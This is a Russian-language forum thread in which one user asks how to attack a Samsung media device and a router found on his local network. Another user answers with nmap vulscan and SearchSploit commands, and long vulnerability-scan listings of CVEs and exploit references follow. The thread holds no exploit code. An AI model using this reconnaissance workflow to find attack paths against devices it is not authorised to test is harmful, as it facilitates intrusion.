атака внутри сети - помогите разобрать самсунг

[swagcat228]

Nmap scan report for 192.168.0.100
Host is up (0.029s latency).
Not shown: 55546 closed ports
PORT      STATE SERVICE             VERSION
7678/tcp  open  upnp                Samsung AllShare upnpd 1.0 (UPnP 1.1)
8001/tcp  open  vcom-tunnel?
8002/tcp  open  ssl/teradataordbms?
8080/tcp  open  http                lighttpd
8187/tcp  open  upnp                Samsung AllShare upnpd 1.0 (UPnP 1.1)
9197/tcp  open  upnp                Samsung AllShare upnpd 1.0 (UPnP 1.1)
15500/tcp open  unknown
39691/tcp open  ssl/unknown
50605/tcp open  rtsp                AirTunes rtspd 377.17.24.6

привет. не так давно обнаружил у себя в сети такое вот замечательное устройство.
гуру метасплоита, подскажите, куда локалхосты тут писать?) и что вообще можно с этим сделать

 

[f22]

гуру метасплоита, подскажите, куда локалхосты тут писать?) и что вообще можно с этим сделать

Посмотри сначала этим аддоном для nmap уязвимые версии
git clone https://github.com/scipag/vulscan scipag_vulscan
ln -s `pwd`/scipag_vulscan /usr/share/nmap/scripts/vulscan
nmap -sV --script=vulscan/vulscan.nse 192.168.0.100

50605/tcp open rtsp AirTunes rtspd 377.17.24.6

Судя по этой строке, устройство может быть какой-то камерой или медиасервером

 

[swagcat228]

Посмотри сначала этим аддоном для nmap уязвимые версии
git clone https://github.com/scipag/vulscan scipag_vulscan
ln -s `pwd`/scipag_vulscan /usr/share/nmap/scripts/vulscan
nmap -sV --script=vulscan/vulscan.nse 192.168.0.100


Судя по этой строке, устройство может быть какой-то камерой или медиарервером

ща отпишу

Посмотри сначала этим аддоном для nmap уязвимые версии
git clone https://github.com/scipag/vulscan scipag_vulscan
ln -s `pwd`/scipag_vulscan /usr/share/nmap/scripts/vulscan
nmap -sV --script=vulscan/vulscan.nse 192.168.0.100


Судя по этой строке, устройство может быть какой-то камерой или медиарервером

охи у него и вывода. терминала не хватает)

50605/tcp open  rtsp                AirTunes rtspd 377.17.24.6
| vulscan: VulDB - https://vuldb.com:
| [137178] D-Link DCS-1130 /sbin/rtspd String memory corruption

ну к примеру этот порт

9197/tcp  open  upnp                Samsung AllShare upnpd 1.0 (UPnP 1.1)
| vulscan: VulDB - https://vuldb.com:
| [138897] Netgear WNDR3400v3 1.0.1.18_1.0.63 upnpd UPnP SSDP Packet Stack-based memory corruption
| [76316] Samsung SBeam 15000 NFC Connection information disclosure
| [63484] MiniUPnPd 1.0 SOAPACTION ExecuteSoapAction denial of service
| [63483] MiniUPnPd 1.0 SOAPACTION ExecuteSoapAction denial of service
| [63482] MiniUPnPd 1.0 SOAPACTION ExecuteSoapAction memory corruption
| [63481] MiniUPnPd 1.0/1.1/1.2/1.3 SDP minissdp.c ProcessSSDPRequest denial of service
| [135896] Samsung Galaxy S9 up to 1.4.20 GameServiceReceiver Update Code Execution memory corruption
| [113616] Knox SDS IAM/SDS EMM 16.11 on Samsung Mobile weak encryption
| [98938] Samsung Account up to 1.6/2.1 weak encryption
| [75176] Samsung Security Manager up to 1.30 HTTP Request privilege escalation
| [74288] Samsung iPOLiS Device Manager 1.12.2 OCX ActiveX Control XnsSdkDeviceIpInstaller.ocx WriteConfigValue memory corruption
| [74213] Samsung Samsung Security Manager up to 1.29 denial of service
| [71220] Miniupnpd 1.9 miniwget.c getHTTPResponse denial of service
| [70020] Samsung iPOLiS Device Manager up to 1.8.1 ActiveX Control memory corruption
| [69949] Samsung iPOLiS Device Manager up to 1.8.1 ActiveX Control Stack-Based memory corruption
| [66860] Samsung Kies 2.5.0.12114 1 ActiveX Control SyncService.dll memory corruption
| [61634] Samsung NET-i viewer 1.37.120316 denial of service
| [61633] Samsung NET-i viewer 1.37.120316 ActiveX Control memory corruption
| [61632] Samsung NET-i viewer 1.37.120316 ActiveX Control Stack-based memory corruption
| [61562] Samsung NET-i viewer 1.37 OCX ActiveX Control XProcessControl.ocx RequestScreenOptimization memory corruption
| [57396] Samsung Data Management Server up to 1.4.1 Authentication Form sql injection
|
| MITRE CVE - https://cve.mitre.org:
| [CVE-2013-1462] Integer signedness error in the ExecuteSoapAction function in the SOAPAction handler in the HTTP service in MiniUPnP MiniUPnPd 1.0 allows remote attackers to cause a denial of service (incorrect memory copy) via a SOAPAction header that lacks a " (double quote) character, a different vulnerability than CVE-2013-0230.
| [CVE-2013-1461] The ExecuteSoapAction function in the SOAPAction handler in the HTTP service in MiniUPnP MiniUPnPd 1.0 allows remote attackers to cause a denial of service (NULL pointer dereference and service crash) via a SOAPAction header that lacks a # (pound sign) character, a different vulnerability than CVE-2013-0230.
| [CVE-2013-0230] Stack-based buffer overflow in the ExecuteSoapAction function in the SOAPAction handler in the HTTP service in MiniUPnP MiniUPnPd 1.0 allows remote attackers to execute arbitrary code via a long quoted method.
| [CVE-2013-2310] SoftBank Wi-Fi Spot Configuration Software, as used on SoftBank SHARP 3G handsets, SoftBank Panasonic 3G handsets, SoftBank NEC 3G handsets, SoftBank Samsung 3G handsets, SoftBank mobile Wi-Fi routers, SoftBank Android smartphones with the Wi-Fi application before 1.7.1, SoftBank Windows Mobile smartphones with the WISPrClient application before 1.3.1, SoftBank Disney Mobile Android smartphones with the Wi-Fi application before 1.7.1, and WILLCOM Android smartphones with the Wi-Fi application before 1.7.1, does not properly connect to access points, which allows remote attackers to obtain sensitive information by leveraging access to an 802.11 network.
| [CVE-2013-0229] The ProcessSSDPRequest function in minissdp.c in the SSDP handler in MiniUPnP MiniUPnPd before 1.4 allows remote attackers to cause a denial of service (service crash) via a crafted request that triggers a buffer over-read.
| [CVE-2012-4335] Samsung NET-i viewer 1.37.120316 allows remote attackers to cause a denial of service (infinite loop) via a negative size value in a TCP request to (1) NiwMasterService or (2) NiwStorageService.  NOTE: some of these details are obtained from third party information.
| [CVE-2012-4334] The ConnectDDNS method in the (1) STWConfigNVR 1.1.13.15 and (2) STWConfig 1.1.14.13 ActiveX controls in Samsung NET-i viewer 1.37.120316 allows remote attackers to execute arbitrary code via unspecified vectors.  NOTE: some of these details are obtained from third party information.
| [CVE-2012-4333] Multiple stack-based buffer overflows in the BackupToAvi method in the (1) UMS_Ctrl 1.5.1.1 and (2) UMS_Ctrl_STW 2.0.1.0 ActiveX controls in Samsung NET-i viewer 1.37.120316 allow remote attackers to execute arbitrary code via a long string in the fname parameter.  NOTE: some of these details are obtained from third party information.
| [CVE-2012-4250] Stack-based buffer overflow in the RequestScreenOptimization function in the XProcessControl.ocx ActiveX control in msls31.dll in Samsung NET-i viewer 1.37 allows remote attackers to execute arbitrary code via a long string in the first argument.
| [CVE-2012-2990] The MASetupCaller ActiveX control before 1.4.2012.508 in MASetupCaller.dll in MarkAny ContentSAFER, as distributed in Samsung KIES before 2.3.2.12074_13_13, does not properly implement unspecified methods, which allows remote attackers to download an arbitrary program onto a client machine, and execute this program, via a crafted HTML document.
| [CVE-2012-1418] Multiple unspecified vulnerabilities in Google Chrome before 17.0.963.60 on the Acer AC700, Samsung Series 5, and Cr-48 Chromebook platforms have unknown impact and attack vectors.
| [CVE-2012-0695] Multiple unspecified vulnerabilities in Google Chrome before 17.0.963.27 on the Acer AC700, Samsung Series 5, and Cr-48 Chromebook platforms have unknown impact and attack vectors.
| [CVE-2011-4719] Multiple unspecified vulnerabilities in Google Chrome before 16.0.912.63 on the Acer AC700, Samsung Series 5, and Cr-48 Chromebook platforms have unknown impact and attack vectors.
| [CVE-2011-4548] Multiple unspecified vulnerabilities in Google Chrome before 16.0.912.44 on the Acer AC700, Samsung Series 5, and Cr-48 Chromebook platforms have unknown impact and attack vectors.
| [CVE-2011-3421] Multiple unspecified vulnerabilities in Google Chrome before 14.0.835.125 on the Acer AC700, Samsung Series 5, and Cr-48 Chromebook platforms have unknown impact and attack vectors.
| [CVE-2011-3420] Multiple unspecified vulnerabilities in Google Chrome before 14.0.835.157 on the Acer AC700, Samsung Series 5, and Cr-48 Chromebook platforms have unknown impact and attack vectors.
| [CVE-2010-4284] SQL injection vulnerability in the authentication form in the integrated web server in the Data Management Server (DMS) before 1.4.3 in Samsung Integrated Management System allows remote attackers to execute arbitrary SQL commands via unspecified vectors.
| [CVE-2007-3445] Buffer overflow in SJ Labs SJphone 1.60.303c, running under Windows Mobile 2003 on the Samsung SCH-i730 phone, allows remote attackers to cause a denial of service (device hang and call termination) via a malformed SIP INVITE message, a different vulnerability than CVE-2007-3351.
|
| SecurityFocus - https://www.securityfocus.com/bid/:
| [54055] Samsung AllShare 'Content-Length' HTTP Header Remote Denial Of Service Vulnerability
| [102336] Samsung/Seagate Self-Encrypting Drive Protection CVE-2015-7267 Local Security Bypass Vulnerability
| [102334] Samsung/Seagate Self-Encrypting Drives Protection CVE-2015-7268 Local Security Bypass Vulnerability
| [99081] Samsung Magician CVE-2017-3218 Remote Code Execution Vulnerability
| [97703] Multiple Samsung Galaxy Products CVE-2016-4031 Security Bypass Vulnerability
| [97701] Multiple Samsung Galaxy Products CVE-2016-4030 Security Bypass Vulnerability
| [97658] Samsung SecEmailSync CVE-2016-2565 Information Disclosure Vulnerability
| [97654] Samsung SecEmailSync CVE-2016-2566 SQL Injection Vulnerability
| [97650] Multiple Samsung Galaxy Products CVE-2016-4032 Security Bypass Vulnerability
| [97207] Samsung Account CVE-2015-0864 Information Disclosure Vulnerability
| [96360] Multiple Samsung Android Mobile Devices CVE-2016-4547 Denial of Service Vulnerability
| [96128] Multiple Samsung Android Mobile Devices InputMethod Application Denial of Service Vulnerability
| [95674] Samsung CVE-2017-5538 Remote Memory Corruption Vulnerability
| [95424] Multiple Samsung Android Mobile Devices CVE-2017-5350 Denial of Service Vulnerability
| [95418] Multiple Samsung Android Mobile Devices CVE-2017-5351 Denial of Service Vulnerability
| [95319] Multiple Samsung Android Mobile Phones CVE-2017-5217 Denial of Service Vulnerability
| [95134] Multiple Samsung Devices 'OTP' Service Remote Heap Buffer Overflow Vulnerability
| [95092] Multiple Samsung Galaxy Product Information Disclosure Vulnerability
| [94955] Samsung Mobile Phones Multiple Denial of Service Vulnerabilities
| [94494] Multiple Samsung Galaxy Product CVE-2016-9567 Security Bypass Vulnerability
| [94292] Samsung Mobile Phones SystemUI CVE-2016-9277 Denial of Service Vulnerability
| [94283] Samsung Mobile Phones Information Disclosure and Denial of Service Vulnerabilities
| [94120] Samsung Mobile Phones CVE-2016-7160 Null Pointer Dereference Denial of Service Vulnerability
| [94088] Multiple Samsung Galaxy Product CVE-2016-7991 Security Bypass Vulnerability
| [94086] Multiple Samsung Galaxy Devices CVE-2016-7990 Integer Overflow Vulnerability
| [94082] Multiple Samsung Galaxy Devices CVE-2016-7989 Denial of Service Vulnerability
| [94081] Samsung Mobile Phones CVE-2016-7988 Denial of Service Vulnerability
| [92539] Samsung Security Manager Multiple Remote Command Execution and Denial of Service Vulnerabilities
| [92349] Samsung 'fimg2d' Driver Null Pointer Deference Local Denial of Service Vulnerability
| [92330] Samsung Android Phone Multiple Privilege Escalation Vulnerabilities
| [91191] Samsung SW Update Software Local Privilege Escalation Vulnerability
| [90104] Samsung Mobile Phones 'IAndroidShm' Service Denial of Service Vulnerability
| [90100] Samsung Mobile Phones 'TvoutService_C' Service Denial of Service Vulnerability
| [86366] Samsung 'msm_sensor_config' Function CVE-2016-4038 Remote Memory Corruption Vulnerability
| [86278] Samsung KNOX CVE-2016-3996 Information Disclosure Vulnerability
| [84287] Samsung SW Update Tool Security Bypass Vulnerability
| [84284] Samsung SW Update Tool Information Disclosure Vulnerability
| [81063] Samsung KNOX CVE-2016-1920 Man in the Middle Information Disclosure Vulnerability
| [81056] Samsung KNOX CVE-2016-1919 Weak Encryption Security Weakness
| [80381] Samsung SRN-1670D Camera Multiple Security Vulnerabilities
| [79675] Samsung SmartTV and Printers CVE-2015-5729 Weak Password Security Vulnerability
| [78024] Miniupnpd CVE-2013-1461 Denial-Of-Service Vulnerability
| [77431] Samsung SecEmailUI CVE-2015-7893 Security Vulnerability
| [77430] Samsung Galaxy S6 CVE-2015-7898 Denial of Service Vulnerability
| [77429] Samsung Galaxy S6 CVE-2015-7895 Denial of Service Vulnerability
| [77425] Samsung LibQjpeg CVE-2015-7896 Remote Memory Corruption Vulnerability
| [77423] Samsung LibQjpeg CVE-2015-7894 Remote Memory Corruption Vulnerability
| [77422] Samsung Galaxy S6 CVE-2015-7897 Memory Corruption Vulnerability
| [77339] Samsung SecEmailComposer CVE-2015-7889 Local Privilege Escalation Vulnerability
| [77338] Samsung Galaxy S6 CVE-2015-7888 Directory Traversal Vulnerability
| [77337] Samsung m2m1shot Driver CVE-2015-7892 Local Buffer Overflow Vulnerability
| [77336] Samsung Sieren Kernel Driver CVE-2015-7890 Local Buffer Overflow Vulnerability
| [77335] Samsung Fimg2d CVE-2015-7891 Local Race Condition Security Bypass Vulnerability
| [77084] Samsung SmartViewer 'CNC_Ctrl' ActiveX Control Remote Code Execution Vulnerability
| [77083] RETIRED: Samsung SmartViewer 'SendCustomPacket' Method Remote Code Execution Vulnerability
| [77079] Samsung SmartViewer CVE-2015-8039 Multiple Remote Code Execution Vulnerabilities
| [76946] Samsung XNS ActiveX SDK ActiveX Control Multiple Remote Code Execution Vulnerabilities
| [76807] Samsung S4 GT-I9500 Memory Corruption and Information Disclosure Vulnerabilities
| [75912] Samsung SyncThru CVE-2015-5473 Multiple Directory Traversal Vulnerabilities
| [75404] Samsung SBeam CVE-2015-4033 Information Disclosure Vulnerability
| [75403] Samsung Galaxy S5 CVE-2015-4034 Remote Code Execution Vulnerability
| [75229] RETIRED: Samsung Galaxy S Phones CVE-2015-2865 Man in The Middle Security Bypass Vulnerability
| [74877] Samsung iPOLiS Device Manager ActiveX Control CVE-2015-0555 Multiple Buffer Overflow Vulnerabilities
| [74400] Samsung Security Manager ActiveMQ Broker Service Multiple Remote Code Execution Vulnerabilities
| [72598] Samsung Security Manager CVE-2015-1499 Security Bypass Vulnerability
| [71489] Samsung SmartViewer 'STWConfig' ActiveX Remote Code Execution Vulnerability
| [71486] Samsung SmartViewer 'CNC_Ctrl' ActiveX Stack Buffer Overflow Vulnerability
| [71148] Multiple Samsung Galaxy Devices KNOX Arbitrary Code Execution Vulnerability
| [67823] Samsung iPOLiS Device Manager 'FindConfigChildeKeyList()' Method Stack Buffer Overflow Vulnerability
| [67822] Samsung iPOLiS Device Manager ActiveX Control Multiple Remote Code Execution Vulnerabilities
| [66192] Samsung Proprietary Android Backdoor Unauthorized Access Vulnerability
| [63726] Samsung Galaxy S4 Unspecified Security Vulnerability
| [61942] Samsung DVR CVE-2013-3585 Information Disclosure Vulnerability
| [61938] Samsung DVR CVE-2013-3586 Cookie Authentication Bypass Vulnerability
| [61881] Samsung DVR Multiple Access Bypass Vulnerabilities
| [61391] Samsung PS50C7700 3D Plasma-TV CVE-2013-4890 Denial of Service Vulnerability
| [61281] Samsung Galaxy S3 And S4 CVE-2013-4764 Local Security Bypass Vulnerability
| [61280] Samsung Galaxy S3 And S4 CVE-2013-4763 Local Security Bypass Vulnerability
| [60756] Samsung Galaxy S4 SMS Spoofing Vulnerability
| [60527] Samsung SHR-5162 and SHR-5082 CVE-2013-3964 Unspecified Cross Site Scripting Vulnerability
| [58320] Samsung TV 'SOAPACTION' Denial of Service Vulnerability
| [58312] Samsung Galaxy S3 Full Lock Screen Security Bypass Vulnerability
| [58123] Samsung Galaxy S3 Screen Lock Security Bypass Vulnerability
| [57249] Samsung Kies CVE-2012-6429 Remote Buffer Overflow Vulnerability
| [57131] SamsungDive for Android CVE-2012-6337 Spoofing Vulnerability
| [57127] SamsungDive for Android CVE-2012-6334 Spoofing Vulnerability
| [56955] Samsung SmartPhones Local Privilege Escalation Vulnerability
| [56692] Samsung and Dell printers Firmware Backdoor Unauthorized Access Vulnerability
| [56560] Samsung Kies Air Denial of Service and Security Bypass Vulnerabilities
| [55936] Samsung Kies Multiple Security Vulnerabilities
| [55053] Samsung Galaxy S2 Epic 4G Touch Multiple Insecure Temporary File Creation Vulnerabilities
| [55047] Multiple Samsung and HTC Devices Information Disclosure Vulnerability
| [53317] Samsung NET-i Viewer 'msls31.dll' ActiveX Buffer Overflow Vulnerability
| [53193] Samsung NET-i ware Multiple Remote Vulnerabilities
| [53161] Samsung TV and BD Products Multiple Denial Of Service Vulnerabilities
| [50682] Samsung Omnia 7 'RapidConfig.exe' XML Provision Remote Code Execution Vulnerability
| [47746] Samsung Integrated Management System DMS SQL Injection Vulnerability
| [34705] Multiple Samsung Devices SMS Provisioning Messages Authentication Bypass Vulnerability
| [31047] Samsung DVR SHR-2040 HTTPD Denial of Service Vulnerability
| [24953] Samsung Linux Printer Driver SetUID Script Local Privilege Escalation Vulnerability
| [16517] Samsung E730 Phone Remote Denial of Service Vulnerability
| [12864] Samsung DSL Modem Multiple Remote Vulnerabilities
| [10219] Samsung SmartEther Switch Firmware Authentication Bypass Vulnerability
| [3008] Samsung ml85p Printer Utility Insecure Temporary File Creation Vulnerability
|
| IBM X-Force - https://exchange.xforce.ibmcloud.com:
| [85904] Samsung PS50C7700 TV denial of service
| [85774] MiniUPnPd Minissdp.c information disclosure
| [85190] Samsung Galaxy S4 spoofing
| [84925] Samsung SHR Series IP cameras unspecified cross-site scripting
| [82662] Samsung TV SOAPACTION denial of service
| [82602] Samsung Galaxy S III Lock Screen security bypass
| [82352] Samsung Galaxy S III Passcode Lock security bypass
| [81803] MiniUPnP MiniUPnPd ExecuteSoapAction denial of service
| [80926] Samsung Galaxy security bypass
| [80923] Samsung Galaxy SamsungDive information disclosure
| [80886] Samsung SmartPhones privilege escalation
| [80709] Samsung Galaxy S2 kernel privilege escalation
| [80336] Samsung printers backdoor
| [80092] Samsung Kies Air security bypass
| [80091] Samsung Kies Air GET denial of service
| [79445] Samsung Kies ActiveX Control registry key security bypass
| [79443] Samsung Kies ActiveX Control security bypass
| [79284] Samsung Kies ActiveX Control CmdAgentLib() security bypass
| [79283] Samsung Kies ActiveX CmdAgent.dll code execution
| [79268] Samsung Kies Samsung.Device Service ActiveX control denial of service
| [79193] Samsung Galaxy S III sandbox privilege escalation
| [79192] Samsung Galaxy S III document viewer code execution
| [78904] Samsung Galaxy S III USSD denial of service
| [77811] Samsung Galaxy S2 Epic 4G Touch symlink
| [76396] AllShare libpin3_dll.dll denial of service
| [75310] Samsung NET-i viewer ActiveX control buffer overflow
| [75070] Samsung NET-i ware ActiveX control buffer overflow
| [75069] Samsung NET-i ware ActiveX control code execution
| [75066] Samsung NET-i ware Master and Storage denial of service
| [74928] Multiple Samsung TV and BD products string denial of service
| [74927] Multiple Samsung TV and BD products controller packet denial of service
| [71316] Samsung Omnia 7 RapiConfig.exe code execution
| [67315] Samsung Integrated Management System DMS authentication form SQL Injection
| [50110] Samsung SMS messages authentication bypass
| [44995] Samsung DVR SHR2040 Web interface denial of service
| [35502] Samsung SCX-4200 driver installation script privilege escalation
| [19927] Samsung default accounts and passwords allow unauthorized access
| [19925] Samsung ADSL Router information disclosure
| [15973] Samsung SmartEther allows administrative access
| [6845] Samsung ML-85G printer driver /tmp symlink
|
| Exploit-DB - https://www.exploit-db.com:
| [25975] MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution
| [21001] Samsung ml85p Printer Driver 1.0 Insecure Temporary File Creation Vulnerability (3)
| [21000] Samsung ml85p Printer Driver 1.0 Insecure Temporary File Creation Vulnerability (2)
| [20999] Samsung ml85p Printer Driver 1.0 Insecure Temporary File Creation Vulnerability (1)
| [27753] Samsung DVR Firmware 1.10 - Authentication Bypass
| [18808] SAMSUNG NET-i Viewer 1.37 SEH Overwrite
| [18765] samsung net-i ware <= 1.37 - Multiple Vulnerabilities
|
| OpenVAS (Nessus) - http://www.openvas.org:
| [902935] Samsung Printer SNMP Hardcoded Community String Authentication Bypass Vulnerability
|
| SecurityTracker - https://www.securitytracker.com:
| [1028821] Samsung PS50C7700 TV Web Server Processing Flaw Lets Remote Users Deny Service
| [1027894] Samsung Phone '/dev/exynos-mem' Lets Local Users Gain Root Privileges
| [1027819] Samsung Printers Hardcoded Password Lets Remote Users Gain Administrative Access
| [1027571] Samsung Galaxy Phones Android Dialer Lets Remote Users Deny Service
| [1026976] Samsung TV Bug in Remote Control Feature Lets Remote Users Deny Service
| [1025508] Samsung Data Management Server Input Validation Flaw Lets Remote Users Inject SQL Commands
| [1013615] Samsung ADSL Router Discloses Files to Remote Users and May Grant Root Access Via Common Default Passwords
| [1009947] Samsung SmartEther Authentication Failure Lets Remote Users Gain Administrative Access
| [1002019] Samsung ML-85G Printer Driver Allows Local Users to Obtain Root Level Access on the Host
|
| OSVDB - http://www.osvdb.org:
| [91493] Google Android on Samsung Unspecified Privileged Application Installation (Issue 1)
| [83012] Samsung AllShare libpin3_dll.dll Content-Length HTTP Header Parsing NULL Pointer Dereference Remote DoS

покажешь как надо?

 

[f22]

покажешь как надо?

Он показывает какие вообще есть уязвимости для этого порта.
Как видишь, у многих устройств на этом порту её не пофиксили.

Попробуй SearchSploit он сразу покажет, какие эксплоиты есть под каждую уязвимость.

 

[swagcat228]

Он показывает какие вообще есть уязвимости для этого порта.
Как видишь, у многих устройств на этом порту её не пофиксили.

Попробуй SearchSploit он сразу покажет, какие эксплоиты есть под каждую уязвимость.

блин, я пробовал nse пару лет назад, испугался количества информации которую она выдает и закрыл. но сейчас понимаю что нужно разбираться.
ушел тот телевизор, или шо оно такое, спать, пробую на роутере.

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-20 03:20 EST
Nmap scan report for 192.168.0.1
Host is up (0.55s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     Dropbear sshd 2012.55 (protocol 2.0)
| vulscan: VulDB - https://vuldb.com:
| [123110] Dropbear up to 2018.76 svr-auth.c recv_msg_userauth_request Messages information disclosure
| [101509] Dropbear up to 2017.74 TCP Listener Double-Free privilege escalation
| [97511] Dropbear SSH up to 2016 dbclient privilege escalation
| [97510] Dropbear SSH up to 2016 dropbearconvert privilege escalation
| [97509] Dropbear SSH up to 2016 Format String
| [81407] Dropbear SSH up to 2016.71 Shell Command Restriction CRLF privilege escalation
| [9860] Simon Tatham PuTTY up to 2010-06-01 SSH Handshake Message Length sshrsa.c/sshdss.c getstring memory corruption
|
| MITRE CVE - https://cve.mitre.org:
| [CVE-2012-0920] Use-after-free vulnerability in Dropbear SSH Server 0.52 through 2012.54, when command restriction and public key authentication are enabled, allows remote authenticated users to execute arbitrary code and bypass command restrictions via multiple crafted command requests, related to "channels concurrency."
|
| SecurityFocus - https://www.securityfocus.com/bid/:
| [92974] Dropbear SSH CVE-2016-7406 Format String Vulnerability
| [92973] Dropbear SSH CVE-2016-7409 Information Disclosure Vulnerability
| [92972] Dropbear CVE-2016-7407 Local Code Execution Vulnerability
| [92970] Dropbear SSH CVE-2016-7408 Remote Code Execution Vulnerability
| [84322] Dropbear SSH CVE-2016-3116 Security Bypass Vulnerability
| [79327] Freesshd CVE-2009-3340 Denial-Of-Service Vulnerability
| [72821] Dropbear SSH Multiple Local Security Bypass Vulnerabilities
| [65562] LXC 'sshd' Template Remote Privilege Escalation Vulnerability
| [63605] OpenSSH 'sshd' Process Remote Memory Corruption Vulnerability
| [62993] Dropbear SSH 'svr-auth.c' User Enumeration Weakness
| [62958] Dropbear SSH 'buf_decompress()' Function Denial of Service Vulnerability
| [62110] MikroTik RouterOS 'sshd' Component Multiple Heap Memory Corruption Vulnerabilities
| [61644] PuTTY Private Key 'putty/sshdss.c' Multiple Information Disclosure Vulnerabilities
| [56785] freeSSHd Authentication Mechanism Authentication Bypass Vulnerability
| [52159] Dropbear SSH Server Use After Free Remote Code Execution Vulnerability
| [38887] freeSSHd SSH2 Connection Data Remote Buffer Overflow Vulnerability
| [38487] ProSSHD 'scp_get()' Buffer Overflow Vulnerability
| [37116] Sun Solaris 'sshd(1M)' Timeout Mechanism Remote Denial Of Service Vulnerability
| [36235] freeSSHd Pre Authentication Error Remote Denial of Service Vulnerability
| [32972] freeSSHd SFTP Commands Multiple Remote Buffer Overflow Vulnerabilities
| [31872] freeSSHd SFTP 'rename' Remote Buffer Overflow Vulnerability
| [29453] freeSSHd SFTP 'opendir' Buffer Overflow Vulnerability
| [27845] freeSSHd 'SSH2_MSG_NEWKEYS' Packet Remote Denial of Service Vulnerability
| [22761] Dropbear Hostkey Mismatch Warning Weakness
| [17024] Dropbear Remote Denial Of Service Vulnerability
| [15923] Dropbear SSH Server Remote Buffer Overflow Vulnerability
| [10803] Dropbear SSH Server Digital Signature Standard Unspecified Authentication Vulnerability
| [8439] Dropbear SSH Server Username Format String Vulnerability
| [4803] OpenBSD sshd BSD Authentication Implementation Error Vulnerability
| [4300] BitVise WinSSHD Numerous Connections DoS Vulnerability
| [3494] SSHD CPU utilization bug
| [797] Sshd RSAREF Buffer Overflow Vulnerability
|
| IBM X-Force - https://exchange.xforce.ibmcloud.com:
| [86268] PuTTY putty/sshdss.c information disclosure
| [80476] FreeSSHd security bypass
| [73444] Dropbear SSH Server code execution
| [71964] FreeSSHd packet denial of service
| [61486] Novell Netware SSHD.NLM and SFTP-SVR.NLM buffer overflow
| [56626] ProSSHD scp_get() buffer overflow
| [54401] Sun Solaris sshd(1M) denial of service
| [53611] FreeSSHd string denial of service
| [52434] freeSSHd open buffer overflow
| [46046] freeSSHd rename and realpath parameters buffer overflow
| [44279] OpenSSH sshd weak security
| [44037] OpenSSH sshd SELinux role unauthorized access
| [42764] freeSSHd SFTP buffer overflow
| [41438] OpenSSH sshd session hijacking
| [40612] FreeSSHd SSH server denial of service
| [39354] FortressSSH sshd.exe denial of service
| [37199] DenyHosts sshd log files denial of service
| [32762] Dropbear SSH client hostkey mismatch weak security
| [25075] Dropbear SSH Server connection denial of service
| [23672] Dropbear SSH Server svr-chansession.c buffer overflow
| [20930] OpenSSH sshd.c LoginGraceTime denial of service
| [16810] Dropbear DSS verification code execution
| [12927] Dropbear login using format specifier causes format string
| [9215] OpenBSD sshd authentication error on systems using YP with netgroups could allow unauthorized access
| [8470] WinSSHD incomplete connections denial of service
| [1249] Sshd version 1.2.23 obsolete
| [316] Sshd advertises information
| [314] Sshd version 1.2.17 obsolete
|
| Exploit-DB - https://www.exploit-db.com:
| [11618] ProSSHD 1.2 20090726 - Buffer Overflow Exploit
|
| OpenVAS (Nessus) - http://www.openvas.org:
| [56070] Gentoo Security Advisory GLSA 200512-13 (dropbear)
|
| SecurityTracker - https://www.securitytracker.com:
| [1027826] freeSSHd Bug Lets Remote Users Gain Access to the Target System
| [1026743] Dropbear SSH Server Use-After-Free Lets Remote Authenticated Users Execute Arbitrary Code
| [1023235] Solaris sshd Timeout Mechanism Lets Remote Users Deny Service
| [1022811] freeSSHd Unspecified Flaw Lets Remote Users Deny Service
| [1021096] freeSSHd Buffer Overflow Lets Remote Authenticated Users Execute Arbitrary Code
| [1020212] freeSSHd Stack Overflow in Processing Directory Name Lets Remote Users Execute Arbitrary Code
| [1015742] Dropbear SSH Server Authorization-Pending Limit Lets Remote Users Deny Service
| [1010785] Dropbear SSH Server DSS Verification Memory Error May Let Remote Users Execute Arbitrary Code
| [1009708] Sun Solaris sshd May Fail to Log SSH Client IP Addresses
| [1007523] Dropbear SSH Server Format String Flaw Lets Remote Users Execute Arbitrary Code
| [1003840] Bitvise WinSSHD Protocol State Error Allows Remote Users to Cause the Secure Shell Server to Stop Accepting Incoming Connections
| [1002748] OpenSSH 3.0 Denial of Service Condition May Allow Remote Users to Crash the sshd Daemon and KerberosV Configuration Error May Allow Remote Users to Partially Authenticate When Authentication Should Not Be Permitted
|
| OSVDB - http://www.osvdb.org:
| [95970] PuTTY sshrsa.c / sshdss.c getstring() Function SSH Handshake Message Length Handling Multiple Remote Integer Overflows
| [88006] freeSSHd Login Failure Remote Authentication Bypass
| [82595] freeSSHd Malformed Packet Handling Remote DoS
| [79590] Dropbear SSH Server Channel Concurrency Use-after-free Remote Code Execution
| [78706] OpenSSH auth-options.c sshd auth_parse_options Function authorized_keys Command Option Debug Message Information Disclosure
| [78425] Oracle Solaris sshd Component Unspecified Remote DoS
| [67743] Novell NetWare OpenSSH SSHD.NLM Absolute Path Handling Remote Overflow
| [67623] freeSSHd SSH Key Exchange NULL Dereference Remote DoS
| [61907] Cisco IOS XR SSH Server sshd_child_handler Process Crafted Packet Remote DoS
| [60498] Solaris sshd(1M) Timeout Mechanism Unspecified Remote DoS
| [59353] OpenSSH sshd Local TCP Redirection Connection Masking Weakness
| [59352] SSH sshd Local TCP Redirection Connection Masking Weakness
| [58495] OpenSSH sshd ChrootDirectory Feature SetUID Hard Link Local Privilege Escalation
| [57927] freeSSHd Unspecified Pre-authentication Remote DoS
| [54362] freeSSHd SFTP Command Handling Multiple Remote Overflows
| [50057] freeSSHd Multiple Parameters Remote Overflow
| [49386] OpenSSH sshd TCP Connection State Remote Account Enumeration
| [48791] OpenSSH on Debian sshd Crafted Username Arbitrary Remote SELinux Role Access
| [45867] freeSSHd SFTP Command Name Handling Overflow
| [43278] FortressSSH sshd.exe Data Object Handling Remote DoS
| [42766] Georgia SoftWorks SSH2 Server (GSW_SSHD) username Field Remote Format String
| [42765] Georgia SoftWorks SSH2 Server (GSW_SSHD) Multiple Authentication Fields Remote Overflow
| [42484] Fail2ban Crafted Client Version sshd Log File Parsing Arbitrary Host Addition DoS
| [42482] DenyHosts Crafted Client Version sshd Log File Parsing Arbitrary Host Addition DoS
| [41849] freeSSHd SSH Server Crafted Packet NULL Pointer Dereference Remote DoS
| [36758] InterWorx-CP NodeWorx sshd.php PATH_INFO Parameter XSS
| [36515] BlockHosts sshd/vsftpd hosts.allow Arbitrary Deny Entry Manipulation
| [33814] Dropbear dbclient hostkey Mismatch Warning Weakness
| [32088] Dropbear SSH dbclient Hostkey Mismatch Weakness
| [31795] Fail2ban sshd Log File Parsing Arbitrary Host Denial DoS
